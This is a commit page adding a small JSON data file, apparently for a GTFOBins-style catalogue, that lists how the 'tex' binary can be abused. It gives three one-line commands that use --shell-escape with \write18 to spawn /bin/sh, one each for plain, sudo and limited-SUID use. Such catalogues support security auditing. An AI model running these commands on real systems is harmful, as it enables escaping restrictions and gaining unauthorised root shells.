add data source for tex

master
Mr. Robot 3 years ago committed by GitHub
parent 78ee9cefd4
commit e2b1e4b24a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,19 @@
{
"functions": {
"shell": [
{
"code": "tex --shell-escape '\\write18{/bin/sh}\\end'\n"
}
],
"sudo": [
{
"code": "sudo tex --shell-escape '\\write18{/bin/sh}\\end'\n"
}
],
"limited-suid": [
{
"code": "./tex --shell-escape '\\write18{/bin/sh}\\end'\n"
}
]
}
}
Loading…
Cancel
Save